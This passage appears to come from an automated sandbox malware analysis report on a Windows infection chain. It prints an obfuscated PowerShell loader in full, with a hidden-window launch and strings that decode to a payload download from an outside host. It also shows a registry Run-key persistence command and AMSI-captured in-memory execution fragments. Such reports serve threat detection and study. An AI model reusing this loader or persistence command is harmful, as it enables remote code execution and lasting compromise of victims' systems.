,eakiKloreMLateri antinUdtrkaK mmuT,uldtE V,std');Yngve (Freeloaded 'Probl$PerioGEksemlDi.agoPostnbsalamaEndo LPerfe:JujubHSuiliE lreSTa llTPerso=glded$ Sup.gPr seiObserGVisnitIndisFU,dlaePig ibAssocETidsuRBesidS .rim.InaptsTryk pRevisl DomfIheldiTSur,n(Ant.t$Slt ed BusieFunktLSymphGTriolgHybrieDolenL GoanSSc ooeruti sBrandDHolodrCom aIMultifoppostPat.neIndt,rKo ifSOrdre)');Yngve (Freeloaded $Soejlevis);$Gigtfebers=$hest[0];$Mervrdiafgift=(Freeloaded 'Who t$ uncogNedd LPincuoBl
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Reconjoin;function Yngve($Sagan){ .($Miljforandringen) ($Sagan)} function Freeloaded($Knyttelversenes){$Unsuppleness=5;do{$Nonordered+=$Knyttelversenes[$Unsuppleness];$Unsuppleness+=6;$Gaardmand=Format-List} until(!$Knyttelversenes[$Unsuppleness])$Nonordered}$Stokerfyrene9=Freeloaded ' GadeN s ejeMangat Anhy.Retniw';$Stokerfyrene9+=Freeloaded 'Lithse nalybFa erc U milPrec.IRailrE SlgtNVid rt';$Udtalendes=Freeloaded 'CommuMSpurro,vulrz in.tiCoccilBir.mlTre eaSte,n/';$Unsupplenesschthyologic=Freeloaded 'VirtuTTermolDebats Humu1Tusin2';$Soejlevis='Green[GratiNCentreM niatHegem. Ud aSGrisgETeaterAfslav Ce lIClaywCFlybyENectaPDionyo PanaI aarenF,refTIn,erMDrgniaLuftfn FednaBeredgRapnie DoveRBreds]Helli:Smoko: portSRestre He lcP.rmuuTalefR ArriiBalbutGastrYSm.lkpPusssRSlaveOTyptoT Sy co ffabCBouiloPlejelB,jle= Soli$SkuesU Ss eNtoymas fteuGa.lopCystep Ui.eLTonsiEjejunn SystEContrSAristSO denCStyk hH ortT Ove h entyParalOTr efL Veg oBargaGHorteIS ngnc';$Udtalendes+=Freeloaded ' Ski 5Ov rk.Jensp0Eastr Inebr( Rev W.elefiPantenGipsudLemaro NeurwApotesManas Attr NZamorTgamle Te.ns1Sputn0cuiss. Ti.s0Fines;Torsk CadmiWFrakoiVul,anGaase6Kreat4,lkef; Stic Uninsx Slag6,awmo4P two;fort UnchrChefsvCivil:D,ndr1uneat3 ykke4Coshe.Fotog0.itel)Kr ig UdpoGTranseS aftcMuslikAortooRetab/Trach2 prin0Skumm1Afrik0Rhamn0Outsp1 cadm0S ill1Be gg KnittFUrtepi AvisreftereNarref K onoInditx S tr/No,su1Rdbed3 Besk4 Bist.Bukse0';$Absurdistisk=Freeloaded ' Kom,uPetu,SGearkEPulveR Kell-GendeaForkoG inusEPseudNSpherT';$Gigtfebers=Freeloaded 'E bothHavmit .wizt inegpReallsMniac:baa.m/Chi.k/Eng lpTapsae ForhnIterodFr,tieAfsp l PurdiRespivAdopteindklr PodoySk alh Nat linde . Har cMisaloD,modmVog.m/BrugeMS ttiuBidsar C mpkAlkyde Anc rOv,rc. SejllMtrikpTank k Spic> Natuh Bl.et F lctMhla,pUndersA gaa:Udvik/Deute/Skol.pMagteeSkibsn Im rd.ophieAntislD iryiPa advNonreeblaakrpatriy Rou,h revolTrskoxSubtrp Medd.Uddifc DyksoUdslum Hrme/WolflMRekinuGrororYndlikT luseSleskr nder.Hektol GrnspStridk';$Delggelsesdrifters=Freeloaded 'Overd>';$Miljforandringen=Freeloaded 'GrublIGraniE By.aX';$Adulterers='sammenbundne';$Unincriminated='\regnskabsinformationernes.arm';Yngve (Freeloaded 'Kontr$ForfagPraecLSemipO ekstbWadinaHjertlClu r:T ailtEd toRGlansOD.gteuK epesSaccaeLebisR Cavae Heget la atMor gENedrySAutop= Toug$OxygaEHistoNA sisVScore:JutehAPluriPClimapprecodPenn aHjemmtTo liA Disj+Skelg$SonorU ContNUnsi Iu iraNAutenCStnder ,eakiKloreMLateri antinUdtrkaK mmuT,uldtE V,std');Yngve (Freeloaded 'Probl$PerioGEksemlDi.agoPostnbsalamaEndo LPerfe:JujubHSuiliE lreSTa llTPerso=glded$ Sup.gPr seiObserGVisnitIndisFU,dlaePig ibAssocETidsuRBesidS .rim.InaptsTryk pRevisl DomfIheldiTSur,n(Ant.t$Slt ed BusieFunktLSymphGTriolgHybrieDolenL GoanSSc ooeruti sBrandDHolodrCom aIMultifoppostPat.neIndt,rKo ifSOrdre)');Yngve (Freeloaded $Soejlevis);$Gigtfebers=$hest[0];$Mervrdiafgift=(Freeloaded 'Wh
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stalemated% -windowstyle 1 $Taknemmeligste=(gi 'HKCU:\Software\Lnoverfrslerne\').GetValue('newsmagazines');%Stalemated% ($Taknemmeligste)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stalemated% -windowstyle 1 $Taknemmeligste=(gi 'HKCU:\Software\Lnoverfrslerne\').GetValue('newsmagazines');%Stalemated% ($Taknemmeligste)"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "echo $Reconjoin;function Yngve($Sagan){ .($Miljforandringen) ($Sagan)} function Freeloaded($Knyttelversenes){$Unsuppleness=5;do{$Nonordered+=$Knyttelversenes[$Unsuppleness];$Unsuppleness+=6;$Gaardmand=Format-List} until(!$Knyttelversenes[$Unsuppleness])$Nonordered}$Stokerfyrene9=Freeloaded ' GadeN s ejeMangat Anhy.Retniw';$Stokerfyrene9+=Freeloaded 'Lithse nalybFa erc U milPrec.IRailrE SlgtNVid rt';$Udtalendes=Freeloaded 'CommuMSpurro,vulrz in.tiCoccilBir.mlTre eaSte,n/';$Unsupplenesschthyologic=Freeloaded 'VirtuTTermolDebats Humu1Tusin2';$Soejlevis='Green[GratiNCentreM niatHegem. Ud aSGrisgETeaterAfslav Ce lIClaywCFlybyENectaPDionyo PanaI aarenF,refTIn,erMDrgniaLuftfn FednaBeredgRapnie DoveRBreds]Helli:Smoko: portSRestre He lcP.rmuuTalefR ArriiBalbutGastrYSm.lkpPusssRSlaveOTyptoT Sy co ffabCBouiloPlejelB,jle= Soli$SkuesU Ss eNtoymas fteuGa.lopCystep Ui.eLTonsiEjejunn SystEContrSAristSO denCStyk hH ortT Ove h entyParalOTr efL Veg oBargaGHorteIS ngnc';$Udtalendes+=Freeloaded ' Ski 5Ov rk.Jensp0Eastr Inebr( Rev W.elefiPantenGipsudLemaro NeurwApotesManas Attr NZamorTgamle Te.ns1Sputn0cuiss. Ti.s0Fines;Torsk CadmiWFrakoiVul,anGaase6Kreat4,lkef; Stic Uninsx Slag6,awmo4P two;fort UnchrChefsvCivil:D,ndr1uneat3 ykke4Coshe.Fotog0.itel)Kr ig UdpoGTranseS aftcMuslikAortooRetab/Trach2 prin0Skumm1Afrik0Rhamn0Outsp1 cadm0S ill1Be gg KnittFUrtepi AvisreftereNarref K onoInditx S tr/No,su1Rdbed3 Besk4 Bist.Bukse0';$Absurdistisk=Freeloaded ' Kom,uPetu,SGearkEPulveR Kell-GendeaForkoG inusEPseudNSpherT';$Gigtfebers=Freeloaded 'E bothHavmit .wizt inegpReallsMniac:baa.m/Chi.k/Eng lpTapsae ForhnIterodFr,tieAfsp l PurdiRespivAdopteindklr PodoySk alh Nat linde . Har cMisaloD,modmVog.m/BrugeMS ttiuBidsar C mpkAlkyde Anc rOv,rc. SejllMtrikpTank k Spic> Natuh Bl.et F lctMhla,pUndersA gaa:Udvik/Deute/Skol.pMagteeSkibsn Im rd.ophieAntislD iryiPa advNonreeblaakrpatriy Rou,h revolTrskoxSubtrp Medd.Uddifc DyksoUdslum Hrme/WolflMRekinuGrororYndlikT luseSleskr nder.Hektol GrnspStridk';$Delggelsesdrifters=Freeloaded 'Overd>';$Miljforandringen=Freeloaded 'GrublIGraniE By.aX';$Adulterers='sammenbundne';$Unincriminated='\regnskabsinformationernes.arm';Yngve (Freeloaded 'Kontr$ForfagPraecLSemipO ekstbWadinaHjertlClu r:T ailtEd toRGlansOD.gteuK epesSaccaeLebisR Cavae Heget la atMor gENedrySAutop= Toug$OxygaEHistoNA sisVScore:JutehAPluriPClimapprecodPenn aHjemmtTo liA Disj+Skelg$SonorU ContNUnsi Iu iraNAutenCStnder ,eakiKloreMLateri antinUdtrkaK mmuT,uldtE V,std');Yngve (Freeloaded 'Probl$PerioGEksemlDi.agoPostnbsalamaEndo LPerfe:JujubHSuiliE lreSTa llTPerso=glded$ Sup.gPr seiObserGVisnitIndisFU,dlaePig ibAssocETidsuRBesidS .rim.InaptsTryk pRevisl DomfIheldiTSur,n(Ant.t$Slt ed BusieFunktLSymphGTriolgHybrieDolenL GoanSSc ooeruti sBrandDHolodrCom aIMultifoppostPat.neIndt,rKo ifSOrdre)');Yngve (Freeloaded $Soejlevis);$Gigtfebers=$hest[0];$Mervrdiafgift=(Freeloaded 'Who t$ uncogNedd LPincuoBlJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stalemated% -windowstyle 1 $Taknemmeligste=(gi 'HKCU:\Software\Lnoverfrslerne\').GetValue('newsmagazines');%Stalemated% ($Taknemmeligste)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stalemated% -windowstyle 1 $Taknemmeligste=(gi 'HKCU:\Software\Lnoverfrslerne\').GetValue('newsmagazines');%Stalemated% ($Taknemmeligste)"Jump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2317923599.00000000080F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdbk source: powershell.exe, 00000004.00000002.2317923599.00000000080F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2312012117.0000000007041000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb source: powershell.exe, 00000004.00000002.2317923599.00000000080F0000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000004.00000002.2319039316.0000000009664000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($superinjustice)$GlOBAl:SPLOTchiEST = [SYsTeM.tExT.ENcODInG]::ascIi.gETSTRIng($OUTWINDeD)$GLoBAL:milIEUBEsKYTTELSeSLoVGivninG=$SPLOTCHiEsT.SUBstrINg($SkafTET106,$SeddELAUtOMaTERs)<#Fo
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Mizanthropises $Strippokeres $Lidelsesfllernes), (Monumentale @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Racemism = [AppDomain]::CurrentDomain.GetAsse
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Seminormalness)), $outsleepingrugerkatalogets).DefineDynamicModule($Smedejernsseng, $false).DefineType($Cartel, $Handlingslammes, [Sys
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($superinjustice)$GlOBAl:SPLOTchiEST = [SYsTeM.tExT.ENcODInG]::ascIi.gETSTRIng($OUTWINDeD)$GLoBAL:milIEUBEsKYTTELSeSLoVGivninG=$SPLOTCHiEsT.SUBstrINg($SkafTET106,$SeddELAUtOMaTERs)<#Fo
